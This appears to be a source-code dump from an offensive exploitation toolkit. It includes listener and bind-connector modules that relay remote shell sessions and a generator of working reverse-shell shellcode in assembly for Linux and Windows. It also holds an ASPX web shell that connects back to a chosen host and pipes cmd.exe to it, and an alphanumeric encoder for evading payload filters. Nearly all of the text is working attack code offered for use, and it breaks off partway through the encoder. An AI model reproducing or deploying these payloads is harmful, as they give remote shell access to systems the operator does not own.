class TCPBindConnector(asyncore.dispatcher):
def __init__(self):
asyncore.dispatcher.__init__(self)
self.__module_name = sys.argv[-1]
self.wsport = 49999
self.connection = create_connection("ws://%s:%s" % ("127.0.0.1", self.wsport))
self.api = APIClient(self.connection)
self.pid = os.getpid()
self.hello()
self.run()
def handle_connect(self):
self.send_message("Connection to %s:%s succeeded" % (self.host, self.port), 1)
def handle_close(self):
self.send_message("\nShell was disconnected", 2)
self.connection.close()
self.close()
sys.exit(1)
def handle_read(self):
data = self.recv_all()
if data:
self.send_message(data, 1)
def recv_all(self, chunk=4096):
buffer = []
while 1:
try:
data = self.recv(chunk)
if not data:
break
buffer.append(data)
except socket.error, e:
err = e.args[0]
if err == errno.EAGAIN or err == errno.EWOULDBLOCK:
# There is no data
break
return "".join(buffer)
def handle_write(self):
res = select.select([self.connection.sock], [], [], 0.2)
if not res[0]:
return
resp = json.loads(self.connection.recv())
command = resp.get('message')
if not command:
return
self.send(command+"\n")
def hello(self):
self.api.hello(self.__module_name, 'listener')
def run(self):
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
options = self.get_options()
self.host = options.get('HOST')
self.port = options.get('PORT')
self.send_message('Trying to connect to %s:%s' % (self.host, self.port))
self.connect((self.host, self.port))
def get_options(self):
resp = self.api.send_command('get_listener_options', module_name=self.__module_name)
return resp
def send_message(self, message, state=0):
''' Listener message to gui
:param message: Message from shell
:param state: 0 - shell is not connected
1 - shell connected
2 - shell disconnected
'''
self.api.send_command('on_listener_message', message=message, module_name=self.__module_name, state=state)
def recv_command(self):
data = self.connection.recv()
data = json.loads(data)
return data.get('message')
if __name__=="__main__":
server = TCPBindConnector()
asyncore.loop()
================================================
FILE: listener/listener.py
================================================
# -*- coding: utf-8 -*-
import Queue
import sys, os
import asyncore
import socket
import json
import logging
import errno
import time
from websocket import create_connection
import select
from Commands import APIClient
class ListenerHandler(asyncore.dispatcher):
def __init__(self, sock, listener):
asyncore.dispatcher.__init__(self, sock)
self.listener = listener
def handle_read(self):
data = self.recv_all()
if data:
self.listener.send_message(data, 1)
def recv_all(self, chunk=4096):
buffer = []
while 1:
try:
data = self.recv(chunk)
if not data:
break
buffer.append(data)
except socket.error, e:
err = e.args[0]
if err == errno.EAGAIN or err == errno.EWOULDBLOCK:
# There is no data
break
return "".join(buffer)
def handle_write(self):
res = select.select([self.listener.connection.sock], [], [], 0.2)
if not res[0]:
return
resp = json.loads(self.listener.connection.recv())
self.listener.logger.info("Recieved: " + str(resp))
command = resp.get('message')
if not command:
return
self.send(command+"\n")
def handle_close(self):
self.listener.send_message("\nShell was disconnected", 2)
self.listener.logger.info("Shell was disconnected")
self.listener.connection.close()
self.close()
self.listener.close()
sys.exit(1)
class Listener(asyncore.dispatcher):
def __init__(self):
self.__module_name = sys.argv[-1]
asyncore.dispatcher.__init__(self)
self.logger = logging.getLogger()
self.logger.setLevel(logging.INFO)
formatter = logging.Formatter('%(filename)s - %(asctime)s - %(levelname)s - %(message)s')
fh = logging.FileHandler('Logs/listener.log')
fh.setLevel(logging.INFO)
fh.setFormatter(formatter)
self.logger.addHandler(fh)
self.pid = os.getpid()
self.host = '0.0.0.0'
self.port = 5555
self.wsport = 49999
self.handler = None
self.connection = create_connection("ws://%s:%s" % ("127.0.0.1", self.wsport))
self.api = APIClient(self.connection)
self.hello()
self.run()
def run(self):
options = {}
options = self.get_options()
self.port = options.get('PORT', self.port)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.set_reuse_addr()
try:
self.bind((self.host, self.port))
except socket.error as msg:
self.logger.error('Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1])
sys.exit()
self.listen(1)
self.send_message("Listening on %s:%s" % (self.host, str(self.port)))
def handle_accept(self):
if self.handler:
return
pair = self.accept()
if pair is not None:
sock, addr = pair
self.shell_addr = repr(addr)
self.send_message("Shell connected to %s" % self.shell_addr, 1)
self.handler = ListenerHandler(sock, self)
def send_message(self, message, state=0):
''' Listener message to gui
:param message: Message from shell
:param state: 0 - shell is not connected
1 - shell connected
2 - shell disconnected
'''
self.logger.info(("Listener PID = %s" % self.pid) + message)
self.api.send_command('on_listener_message', message=message, module_name=self.__module_name, state=state)
def get_options(self):
resp = self.api.send_command('get_listener_options', module_name=self.__module_name)
self.logger.debug(resp)
return resp
def hello(self):
self.api.hello(self.__module_name, 'listener')
if __name__=="__main__":
server = Listener()
asyncore.loop()
================================================
FILE: shellcodes/Asm.py
================================================
#!/usr/bin/python
# -*- coding: utf-8 -*-
from ctypes import *
from ShellUtils import *
class ShellGenerator:
def __init__(self, OS_TARGET, OS_TARGET_ARCH):
self.os_target = OS_TARGET
self.target = None
if OS_TARGET == Constants.OS.WINDOWS:
self.target = WindowsShellcodes(OS_TARGET_ARCH)
elif OS_TARGET == Constants.OS.LINUX:
self.target = LinuxShellcodes(OS_TARGET_ARCH)
else:
print("OS '%s' is not supported" % OS_TARGET)
return
self.OS_TARGET_ARCH = OS_TARGET_ARCH
def get_shellcode(self, type, message="", connectback_ip="127.0.0.1", connectback_port=5555, command="", make_exe=0, debug=0, filename="", dll_inj_funcs=[]):
if not self.target:
print("Generating shellcodes for '%s' OS is not supported" % self.os_target)
return None
if type not in self.target.shell_types:
print("There no shellcodes of type '%s' for system %s" % (type, self.target_os))
return None
code = ""
need_to_build = False
if type == "message":
code = self.target.message(message)
elif type == "reverse":
if not connectback_ip or not connectback_port:
print "You must specify connectback params"
return None
code = self.target.reverse(connectback_ip, connectback_port)
elif type == "command":
code = self.target.command(command)
else:
return None
shell, filepath = create_shellcode(code, self.os_target, self.OS_TARGET_ARCH, make_exe, debug, filename, dll_inj_funcs)
return shell, filepath
class LinuxShellcodes():
"""
Class with shellcodes (asm language)
"""
def __init__(self, OS_TARGET_ARCH):
self.shell_types = ["message", "reverse"]
self.target_os = "LINUX"
self.OS_TARGET_ARCH = OS_TARGET_ARCH
def message(self, message=''):
"""
Get simple asm code for Linux
"""
if not message:
message = 'hello'
code = """
BITS OS_TARGET_ARCH
jmp short one
two:
pop ecx ;get the address of the string from the stack
xor eax, eax ;clean up the registers
mov al, 4 ;syscall write
xor ebx, ebx
inc ebx ;stdout is 1
xor edx,edx
mov dl, LENGTH ;length of the string
int 0x80
mov al, 1 ;exit the shellcode
dec ebx
int 0x80
one:
call two ;jump to avoid null-bytes
db 'MESSAGE', 0x0a, 0x0d
"""
if self.OS_TARGET_ARCH == '32bit':
code = code.replace("OS_TARGET_ARCH", "32")
elif self.OS_TARGET_ARCH == '64bit':
code = code.replace("OS_TARGET_ARCH", "64")
code = code.replace("ecx", "rcx")
else:
print "Format: %s is not supported" % self.OS_TARGET_ARCH
return
code = code.replace("MESSAGE", message)
code = code.replace("LENGTH", str(len(message)))
return code
def reverse(self, connectback_ip, connectback_port):
"""
Get reverse shellcode for Linux
"""
# Reverse engineering
# $ strace -e execve,socket,bind,connect nc 127.0.0.1 12357
# execve("/usr/bin/nc", ["nc", "127.0.0.1", "12357"], [/* 59 vars */]) = 0
# socket(PF_NETLINK, SOCK_RAW, 0) = 3
# bind(3, {sa_family=AF_NETLINK, pid=0, groups=00000000}, 12) = 0
#
# Here is a part we were looking for:
#
# socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
# connect(
# 3,
# {sa_family=AF_INET, sin_port=htons(12357), sin_addr=inet_addr("127.0.0.1")},
# 16
# ) = -1 EINPROGRESS (Operation now in progress)
if not connectback_ip or not connectback_port:
print "You must specify some params"
return None
code = ""
if self.OS_TARGET_ARCH == '32bit':
code = """
BITS 32
global _start
_start:
; =============================== SOCKET =====================================
; socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
;
; int socket(int domain, int type, int protocol);
;
; int socketcall(int call, unsigned long *args)
; socketcall SYS_SOCKET socket() args
; EAX EBX ECX
; 102 1 (2, 1, 6)
;
; SYS_SOCKET will return file descriptor (fd) in EAX.
; EAX
xor eax, eax
mov al, 102 ; socketcall
; EBX
xor ebx, ebx
mov bl, 1 ; SYS_SOCKET socket()
; ECX
xor ecx, ecx
push ecx
push BYTE 6 ; IPPROTO_TCP || int protocol);
push BYTE 1 ; SOCK_STREAM || int type,
push BYTE 2 ; AF_INET || socket(int domain,
mov ecx, esp ; ECX - PTR to arguments for socket()
int 0x80 ; sockfd will be stored in EAX after this call
; EAX return
mov esi, eax ; save socket fd in ESI for later
;
; =============================== CONNECT =====================================
;
; connect(
; 3,
; {sa_family=AF_INET, sin_port=htons(12357), sin_addr=inet_addr("127.0.0.1")},
; 16
; ) = -1 EINPROGRESS (Operation now in progress)
;
; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
;
jmp short call_get_ip_and_port
back2shellcode:
pop edi ; getting ip and port address from ESP
; EAX
xor eax, eax
mov al, 102 ; socketcall
; EBX
xor ebx, ebx
mov bl, 3 ; SYS_CONNECT connect()
; ECX
xor edx, edx
; push edx ; 0.0.0.0 - ALL interfaces
; push DWORD 0x0100007f ; 127.0.0.1 in reverse *** CONTAINS NULLs ! ***
; push DWORD 0x0101a8c0 ; 192.168.1.1 in reverse
push DWORD [edi] ; push IP
push WORD [edi+0x4] ; push port
dec ebx ; decrease bl from 3 to 2 to use it in the next push
push WORD bx ; 2 - AF_INET
inc ebx ; put back bl to 3 for SYS_CONNECT
mov ecx, esp ; ptr to struct sockaddr
push BYTE 16 ; socklen_t addrlen);
push ecx ; const struct sockaddr *addr,
push esi ; connect(int sockfd,
mov ecx, esp ; ECX = PTR to arguments for connect()
int 0x80 ; sockfd will be in EBX
;
; =============================== DUP FD =====================================
;
; Before we spawn a shell, we need to forward all I/O (stdin,stdout,stderr)
; to a client. For this, we can dup2 syscall to duplicate a file descriptor.
; man 2 dup2
; int dup2(int oldfd, int newfd);
; EAX, EBX, ECX
; 63 sockfd 0
; 63 sockfd 1
; 63 sockfd 2
;
; move our sockfd to EAX
mov eax, ebx
xor eax, eax
mov al, 63 ; dup2 syscall
xor ecx, ecx ; 0 - stdin
int 0x80 ; call dup2(sockfd, 0)
mov al, 63 ; dup2 syscall
mov cl, 1 ; 1 - stdout
int 0x80 ; call dup2(sockfd, 1)
mov al, 63 ; dup2 syscall
mov cl, 2 ; 2 - stderr
int 0x80 ; call dup2(sockfd, 2)
;
; =============================== EXECVE =====================================
;
; Now as we forwarded sockfd to a client, we can spawn shell.
; Prepare the path, in little-endian, using the Python
; >>> '//bin/sh'[::-1].encode('hex')
; '68732f6e69622f2f'
;
; int execve(const char *filename, char *const argv[], char *const envp[]);
; EAX EBX, ECX, EDX
; 11 '//bin/sh' PTR to EBX NULL
; EAX
xor eax, eax
mov al, 11 ; execve syscall
; EBX
xor edx, edx
push edx ; NULL termination of '//bin/sh' string
push 0x68732f6e ; '//bin/sh' in reverse
push 0x69622f2f ; beginning of '//bin/sh' string is here
mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
; ECX
push edx ; NULL termination of a stack
push ebx ; load our '//bin/sh' on a stack
mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
; EDX
push edx ; NULL terminator
mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
int 0x80 ; call execve(EBX, ECX, EDX)
call_get_ip_and_port:
call back2shellcode
; dd 0x0101a8c0 ; Example: DWORD 192.168.1.1 reverse (in hex)
; db 0xc0, 0xa8, 0x01, 0x01 ; Example: BYTE 192.168.1.1 straight (in hex)
db CONNECTBACK_IP
; dw 0x4530 ; Example: WORD 12357 reverse (in hex)
; db 0x30, 0x45 ; Example: BYTE 12357 straight (in hex)
db CONNECTBACK_PORT
"""
connectback_ip_hex = ''
for i in connectback_ip.split('.'):
connectback_ip_hex += '0x' + '{:02X}'.format(int(i)) + ', '
connectback_ip_hex = connectback_ip_hex[:-2]
connectback_port_hex = '0x' + '{:04X}'.format(connectback_port)[:-2] + ', '
connectback_port_hex += '0x' + '{:04X}'.format(connectback_port)[-2:]
elif self.OS_TARGET_ARCH == '64bit':
code = """
BITS 64
global _start
; settings
;IP equ 0x0100007f ; default 127.0.0.1, contains nulls so will need mask
IP equ CONNECTBACK_IP
;PORT equ 0x5c11 ; default 4444
PORT equ CONNECTBACK_PORT
; syscall kernel opcodes
SYS_SOCKET equ 0x29
SYS_CONNECT equ 0x2a
SYS_DUP2 equ 0x21
SYS_EXECVE equ 0x3b
; argument constants
AF_INET equ 0x2
SOCK_STREAM equ 0x1
_start:
; High level psuedo-C overview of shellcode logic:
;
; sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
;
; struct sockaddr = {AF_INET; [PORT; IP; 0x0]}
;
; connect(sockfd, &sockaddr, 16)
;
; dup2(sockfd, STDIN+STDOUT+STDERR)
; execve("/bin/sh", NULL, NULL)
create_sock:
; sockfd = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; syscall number 41
xor esi, esi ; 0 out rsi
mul esi ; 0 out rax, rdx
; rdx = IPPROTO_IP (int: 0)
inc esi ; rsi = SOCK_STREAM (int: 1)
push AF_INET ; rdi = AF_INET (int: 2)
pop rdi
add al, SYS_SOCKET
syscall
; copy socket descriptor to rdi for future use
push rax
pop rdi
struct_sockaddr:
; server.sin_family = AF_INET
; server.sin_port = htons(PORT)
; server.sin_addr.s_addr = inet_addr("127.0.0.1")
; bzero(&server.sin_zero, 8)
push rdx
push rdx
mov dword [rsp + 0x4], IP
mov word [rsp + 0x2], PORT
mov byte [rsp], AF_INET
connect_sock:
; connect(sockfd, (struct sockaddr *)&server, sockaddr_len)
push rsp
pop rsi
push 0x10
pop rdx
push SYS_CONNECT
pop rax
syscall
dupe_sockets:
; dup2(sockfd, STDIN)
; dup2(sockfd, STDOUT)
; dup2(sockfd, STERR)
push 0x3 ; loop down file descriptors for I/O
pop rsi
dupe_loop:
dec esi
mov al, SYS_DUP2
syscall
jne dupe_loop
exec_shell:
; execve('//bin/sh', NULL, NULL)
push rsi ; *argv[] = 0
pop rdx ; *envp[] = 0
push rsi ; '\0'
mov rdi, '//bin/sh' ; str
push rdi
push rsp
pop rdi ; rdi = &str (char*)
mov al, SYS_EXECVE ; we fork with this syscall
syscall
"""
connectback_ip_hex = '0x'
for i in reversed(connectback_ip.split('.')):
connectback_ip_hex += '{:02X}'.format(int(i))
connectback_port_hex = '0x' + '{:04X}'.format(connectback_port)[-2:]
connectback_port_hex += '{:04X}'.format(connectback_port)[:-2]
else:
print "Format: %s is not supported" % self.OS_TARGET_ARCH
return
code = code.replace("CONNECTBACK_IP", connectback_ip_hex)
code = code.replace("CONNECTBACK_PORT", connectback_port_hex)
return code
class WindowsShellcodes():
def __init__(self, OS_TARGET_ARCH):
self.shell_types = ["message", "reverse", "command"]
self.target_os = "WINDOWS"
self.target_arch = OS_TARGET_ARCH
def message(self, message=''):
"""
Get simple asm code for windows
"""
if not message:
message = 'hello'
code = """
global _start
_start:
;eax holds return value
;ebx will hold function addresses
;ecx will hold string pointers
;edx will hold NULL
xor eax,eax
xor ebx,ebx ;zero out the registers
xor ecx,ecx
xor edx,edx
jmp short GetLibrary
LibraryReturn:
pop ecx ;get the library string
mov [ecx + 10], dl ;insert NULL
mov ebx, ADDR_LoadLibraryA ;LoadLibraryA(libraryname);
push ecx ;beginning of user32.dll
call ebx ;eax will hold the module handle
jmp short FunctionName
FunctionReturn:
pop ecx ;get the address of the Function string
xor edx,edx
mov [ecx + 11], dl ;insert NULL
push ecx
push eax
mov ebx, ADDR_GetProcAddress ;GetProcAddress(hmodule,functionname);
call ebx ;eax now holds the address of MessageBoxA
jmp short Message
MessageReturn:
pop ecx ;get the message string
xor edx,edx
mov [ecx+3], dl ;insert the NULL
xor edx,edx
push edx ;MB_OK
push ecx ;title
push ecx ;message
push edx ;NULL window handle
call eax ;MessageBoxA(windowhandle,msg,title,type); Address
ender:
xor edx,edx
push eax
mov eax, ADDR_ExitProcess ;ExitProcess(exitcode);
call eax ;exit cleanly so we don't crash the parent program
;the N at the end of each string signifies the location of the NULL
;character that needs to be inserted
GetLibrary:
call LibraryReturn
db 'user32.dllN'
FunctionName:
call FunctionReturn
db 'MessageBoxAN'
Message:
call MessageReturn
db 'MESSAGEN'
"""
code = code.replace("MESSAGE", str(message))
functions = ['LoadLibraryA', 'GetProcAddress', 'ExitProcess']
handle = windll.kernel32.GetModuleHandleA('kernel32.dll')
for func in functions:
address = hex(windll.kernel32.GetProcAddress(handle, func))
code = code.replace("ADDR_" + func, str(address))
return code
def command(self, command='calc.exe', technique='PEB'):
"""
Get simple asm code for windows
"""
code = ''
if technique == 'SEH':
code = """
global _start
_start:
call start_main
LGetProcAddress:
push ebx
push ebp
push esi
push edi
mov ebp, [esp + 24]
mov eax, [ebp + 0x3c]
mov edx, [ebp + eax + 120]
add edx, ebp
mov ecx, [edx + 24]
mov ebx, [edx + 32]
add ebx, ebp
LFnlp:
jecxz LNtfnd
dec ecx
mov esi, [ebx + ecx * 4]
add esi, ebp
xor edi, edi
cld
LHshlp:
xor eax, eax
lodsb
cmp al, ah
je LFnd
ror edi, 13
add edi, eax
jmp short LHshlp
LFnd:
cmp edi, [esp + 20]
jnz LFnlp
mov ebx, [edx + 36]
add ebx, ebp
mov cx, [ebx + 2 * ecx]
mov ebx, [edx + 28]
add ebx, ebp
mov eax, [ebx + 4 * ecx]
add eax, ebp
jmp short LDone
LNtfnd:
xor eax, eax
LDone:
pop edi
pop esi
pop ebp
pop ebx
ret 8
start_main:
pop esi
push byte 0x30
pop ecx
mov ebx, [fs:ecx]
mov ebx, [ebx + 0x0c]
mov ebx, [ebx + 0x1c]
mov ebx, [ebx]
mov ebx, [ebx + 0x08]
push ebx ; kernel32.dll base
push HASH_WinExec ; WinExec
call esi ; GetProcAddress(kerne32.dll, WinExec)
push eax
push ebx ; kernel32.dll base
push HASH_ExitProcess ; ExitProcess
call esi ; GetProcAddress(kerne32.dll, ExitProcess)
push eax
"""
code += """
jmp short GetCommand
CommandReturn:
pop ebx ; ebx now holds the handle to the string
;xor eax,eax
push eax
xor eax,eax ; for some reason the registers can be very volatile, did this just in case
;mov [ebx + 89],al ; insert the NULL character
push ebx
mov ebx, [ebp-32] ; WinExec: 0x7c86114d
call ebx ; call WinExec(path,showcode)
xor eax,eax ; zero the register again, clears WinExec retval
push eax
mov ebx, [ebp-36] ; ExitProcess: 0x7c81caa2
call ebx ;call ExitProcess(0);
GetCommand:
;the N at the end of the db will be replaced with a null character
call CommandReturn
db "COMMAND 0"
"""
code = code.replace("COMMAND", str(command))
code = code.replace('HASH_WinExec', str(self.compute_hash_by('WinExec', 0xd)))
code = code.replace('HASH_ExitProcess', str(self.compute_hash_by('ExitProcess', 0xd)))
if technique == 'PEB':
code = """
global _start
_start:
jmp start_main
;peb technique
find_kernel32:
xor eax, eax ; clear ebx
mov eax, [fs:0x30] ; get a pointer to the PEB
mov eax, [eax+0x0C] ; get PEB->Ldr
mov eax, [eax+0x14] ; get PEB->Ldr.InMemoryOrderModuleList.Flink (1st entry)
mov eax, [eax] ; get the next entry (2nd entry)
mov eax, [eax] ; get the next entry (3rd entry)
mov eax, [eax+0x10] ; get the 3rd entries base address (kernel32.dll)
ret
;Function : Find function base address
find_function:
pushad
mov ebp,[esp+0x24]
mov eax,[ebp+0x3c]
mov edx,[ebp+eax+0x78]
add edx,ebp
mov ecx,[edx+0x18]
mov ebx,[edx+0x20]
add ebx,ebp
find_function_loop:
jecxz find_function_finished
dec ecx
mov esi,[ebx+ecx*4]
add esi,ebp
xor edi,edi
xor eax,eax
cld
compute_hash_again:
lodsb
test al,al
jz compute_hash_finished
ror edi,0xd
add edi,eax
jmp compute_hash_again
compute_hash_finished:
find_function_compare:
cmp edi,[esp+0x28]
jnz find_function_loop
mov ebx,[edx+0x24]
add ebx,ebp
mov cx,[ebx+2*ecx]
mov ebx,[edx+0x1c]
add ebx,ebp
mov eax,[ebx+4*ecx]
add eax,ebp
mov [esp+0x1c],eax
find_function_finished:
popad
ret
find_funcs_for_dll:
lodsd
push eax
push edx
call find_function
mov [edi], eax
add esp,0x08
add edi,0x04
cmp esi,ecx
jne find_funcs_for_dll
find_funcs_for_dll_finished:
ret
GetHashes:
call GetHashesReturn
dd HASH_CreateFileA ; CreateFileA hash
dd HASH_WriteFile ; WriteFile hash
dd HASH_CloseHandle ; CloseHandle hash
dd HASH_WinExec ; WinExec hash
dd HASH_ExitProcess ; ExitProcess hash
;Main
start_main:
sub esp,0x14 ;allocate space on stack to store 5 function address
mov ebp,esp
call find_kernel32
mov edx,eax ;save base address of kernel32 in edx
jmp GetHashes ;get address of WinExec hash
GetHashesReturn:
pop esi ;get pointer to hash into esi
lea edi, [ebp+0x4] ;we will store the function addresses at edi
mov ecx,esi
add ecx,0x14 ; store address of last hash into ecx
call find_funcs_for_dll ;get function pointers for all hashes
jmp startcalling
startcalling:
;All Done Start calling Win32 APIs
xor eax,eax
xor ebx,ebx ;zero out the registers
xor ecx,ecx ;ECX will always hold 0
jmp GetArgument
GetArgument:
call ArgumentReturn
db "COMMAND 0"
ArgumentReturn: ;calc.exe
pop edx
push edx
call [ebp+16] ;WinExec.Kernel32.dll
push ecx ;0
call [ebp+20] ;ExitProcess.Kernel32.dll
"""
code = code.replace("COMMAND", str(command))
code = code.replace('HASH_CreateFileA', str(self.compute_hash_by('CreateFileA', 0xd)))
code = code.replace('HASH_WriteFile', str(self.compute_hash_by('WriteFile', 0xd)))
code = code.replace('HASH_CloseHandle', str(self.compute_hash_by('CloseHandle', 0xd)))
code = code.replace('HASH_WinExec', str(self.compute_hash_by('WinExec', 0xd)))
code = code.replace('HASH_ExitProcess', str(self.compute_hash_by('ExitProcess', 0xd)))
return code
def reverse(self, connectback_ip, connectback_port):
code = """
global _start
_start:
cld
call main
pusha
mov ebp,esp
xor eax,eax
mov edx,DWORD [fs:eax+0x30]
mov edx,DWORD [edx+0xc]
mov edx,DWORD [edx+0x14]
place1:
mov esi,DWORD [edx+0x28]
movzx ecx,WORD [edx+0x26]
xor edi,edi
loop1:
lodsb
cmp al,0x61
jl place2
sub al,0x20
place2:
ror edi,0xd
add edi,eax
loop loop1
push edx
push edi
mov edx,DWORD [edx+0x10]
mov ecx,DWORD [edx+0x3c]
mov ecx,DWORD [ecx+edx*1+0x78]
jecxz place6
add ecx,edx
push ecx
mov ebx,DWORD [ecx+0x20]
add ebx,edx
mov ecx,DWORD [ecx+0x18]
place3:
jecxz place5
dec ecx
mov esi,DWORD [ebx+ecx*4]
add esi,edx
xor edi,edi
place4:
lodsb
ror edi,0xd
add edi,eax
cmp al,ah
jne place4
add edi,DWORD [ebp-0x8]
cmp edi,DWORD [ebp+0x24]
jne place3
pop eax
mov ebx,DWORD [eax+0x24]
add ebx,edx
mov cx,WORD [ebx+ecx*2]
mov ebx,DWORD [eax+0x1c]
add ebx,edx
mov eax,DWORD [ebx+ecx*4]
add eax,edx
mov DWORD [esp+0x24],eax
pop ebx
pop ebx
popa
pop ecx
pop edx
push ecx
jmp eax
place5:
pop edi
place6:
pop edi
pop edx
mov edx,DWORD [edx]
jmp place1
main:
pop ebp
push 0x3233
push 0x5f327377
push esp
push 0x726774c
call ebp
mov eax,0x190
sub esp,eax
push esp
push eax
push 0x6b8029
call ebp
push eax
push eax
push eax
push eax
inc eax
push eax
inc eax
push eax
push 0xe0df0fea
call ebp
xchg edi,eax
push 0x5
push CONNECTBACK_IP ;host
push CONNECTBACK_PORT ; port
mov esi,esp
place7:
push 0x10
push esi
push edi
push 0x6174a599
call ebp
test eax,eax
je place8
dec DWORD [esi+0x8]
jne place7
push 0x56a2b5f0
call ebp
place8:
push 0x646d63
mov ebx,esp
push edi
push edi
push edi
xor esi,esi
push 0x12
pop ecx
loop2:
push esi
loop loop2
mov WORD [esp+0x3c],0x101
lea eax,[esp+0x10]
mov BYTE [eax],0x44
push esp
push eax
push esi
push esi
push esi
inc esi
push esi
dec esi
push esi
push esi
push ebx
push esi
push 0x863fcc79
call ebp
mov eax,esp
dec esi
push esi
inc esi
push DWORD [eax]
push 0x601d8708
call ebp
mov ebx,0x56a2b5f0
push 0x9dbd95a6
call ebp
cmp al,0x6
jl place9
cmp bl,0xe0
jne place9
mov ebx,0x6f721347
place9:
push 0x0
push ebx
call ebp
"""
connectback_ip_hex = '0x'
connectback_ip_arr = []
for i in connectback_ip.split('.'):
connectback_ip_arr.append('{:02X}'.format(int(i)))
for i in reversed(connectback_ip_arr):
connectback_ip_hex += i
connectback_port_hex = '0x' + '{:04X}'.format(connectback_port)[-2:]
connectback_port_hex += '{:04X}'.format(connectback_port)[:-2]
connectback_port_hex += '0002'
code = code.replace("CONNECTBACK_IP", connectback_ip_hex)
code = code.replace("CONNECTBACK_PORT", connectback_port_hex)
return code
def compute_hash_by(self, key, num=0xd):
"""
Compute hash of WinApi functions
"""
hash = 0
while key:
c_ptr = ord(key[0])
hash = (hash << (32 - num)) & 0xffffffff | (hash >> num) & 0xffffffff
hash += c_ptr
key = key[1:]
hash = "0x%08x" % hash
return hash
================================================
FILE: shellcodes/DotNetShellcode.py
================================================
import os
from shellcode import Shellcode
class AspxShellcode(Shellcode):
"""
Class with shellcodes for java language
"""
def __init__(self, connectback_ip='localhost', connectback_port=5555,
badchars=['\x00']):
Shellcode.__init__(self, connectback_ip=connectback_ip, connectback_port=connectback_port, badchars=badchars)
def get_reverse(self, inline=False):
""" Function to get aspx reverse shellcode """
if not self.CONNECTBACK_IP or not self.CONNECTBACK_PORT:
print ("Settings for connectback listener must be defined")
return False
aspx = """
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>
<%@ Import Namespace="System.Net" %>
<%@ Import Namespace="System.Net.Sockets" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Security.Principal" %>
<script runat="server">
static NetworkStream socketStream;
protected void CallbackShell(string server, int port)
{
System.Net.Sockets.TcpClient clientSocket = new System.Net.Sockets.TcpClient();
clientSocket.Connect(server, port);
socketStream = clientSocket.GetStream();
Byte[] bytes = new Byte[8192];
String data = null;
Process CmdProc;
CmdProc = new Process();
CmdProc.StartInfo.FileName = "cmd";
CmdProc.StartInfo.UseShellExecute = false;
CmdProc.StartInfo.RedirectStandardInput = true;
CmdProc.StartInfo.RedirectStandardOutput = true;
CmdProc.StartInfo.RedirectStandardError = true;
CmdProc.OutputDataReceived += new DataReceivedEventHandler(SortOutputHandler);
CmdProc.ErrorDataReceived += new DataReceivedEventHandler(SortOutputHandler);
CmdProc.Start();
CmdProc.BeginOutputReadLine();
CmdProc.BeginErrorReadLine();
StreamWriter sortStreamWriter = CmdProc.StandardInput;
int i;
while ((i = socketStream.Read(bytes, 0, bytes.Length)) != 0)
{
data = System.Text.Encoding.ASCII.GetString(bytes, 0, i);
if (data == "exit")
break;
sortStreamWriter.WriteLine(data.Trim());
}
clientSocket.Close();
CmdProc.Close();
}
public static void SortOutputHandler(object sendingProcess, DataReceivedEventArgs outLine)
{
string[] SplitData = outLine.Data.Split('\\n');
foreach (string s in SplitData)
{
byte[] msg = System.Text.Encoding.ASCII.GetBytes(s + "\\r\\n");
socketStream.Write(msg, 0, msg.Length);
}
}
protected void Page_Load(object sender, EventArgs e)
{
CallbackShell("LOCALHOST", LOCALPORT);
}
</script>"""
if inline:
aspx = self.make_inline(aspx)
aspx = aspx.replace("LOCALHOST", str(self.CONNECTBACK_IP)).replace("LOCALPORT", str(self.CONNECTBACK_PORT))
return aspx
def get_shellcode(self, inline=False):
return self.get_reverse(inline)
================================================
FILE: shellcodes/Encoders.py
================================================
#!/usr/bin/python
# -*- coding: utf-8 -*-
from random import *
import sys
from Runshellcode import RunShellcode
from ShellUtils import *
import types
class EncoderError(Exception): pass
class Encoder(object):
def encode(self, payload):
return payload
class AlphanumericEncoder(Encoder):
def __init__(self, disallowed_chars="\x00\x0d\x0a", buffer_register='ecx', offset=0):
self.buffer_register = buffer_register
self.allowed_chars = self.create_allowed_chars(disallowed_chars)
self.offset = offset
def create_allowed_chars(self, bad_chars):
allowed_chars = range(0x61, 0x7b)+range(0x42, 0x5b) + range(0x30,0x3a)
for ch in bad_chars:
if ord(ch) in allowed_chars:
allowed_chars.remove(ord(ch))
return allowed_chars
def encode(self, payload):
shell = [ord(c) for c in payload]
reg = self.buffer_register.upper()
stub =self.create_decoder_stub(reg)
offset=0
encoded=""
while offset < len(shell):
block = shell[offset: offset+1]
encoded+=self.encode_byte(block)
offset+=1
return stub+encoded+'AA'
def create_decoder_stub(self, reg):
decoder = self.gen_decoder_prefix(reg) + (
"jA" # push 0x41
"X" # pop eax
"P" # push eax
"0A0" # xor byte [ecx+30], al
"A" # inc ecx <---
"kAAQ" # imul eax, [ecx+42], 51 -> 10 |
"2AB" # xor al, [ecx + 42] |
"2BB" # xor al, [edx + 42] |
"0BB" # xor [edx + 42], al |
"A" # inc ecx |
"B" # inc edx |
"X" # pop eax |
"P" # push eax |
"8AB" # cmp [ecx + 42], al |
"uJ" # jnz short -------------------------
"I") # first encoded char, fixes the above J
return decoder
def gen_decoder_prefix(self, reg):
if self.offset > 32:
raise Exception("Critical: Offset is greater than 32")
# use inc ebx as a nop here so we still pad correctly
if self.offset <= 16:
nop = 'C' * self.offset
mod = 'I' * (16 - self.offset) + nop + '7QZ' # dec ecx,,, push ecx, pop edx
edxmod = 'J' * (17 - self.offset)
else:
mod = 'A' * (self.offset - 16)
nop = 'C' * (16 - mod.length)
mod += nop + '7QZ'
edxmod = 'B' * (17 - (self.offset - 16))
regprefix = {
'EAX' : 'PY' + mod, # push eax, pop ecx
'ECX' : 'I' + mod, # dec ecx
'EDX' : edxmod + nop + '7RY', # dec edx,,, push edx, pop ecx
'EBX' : 'SY' + mod, # push ebx, pop ecx
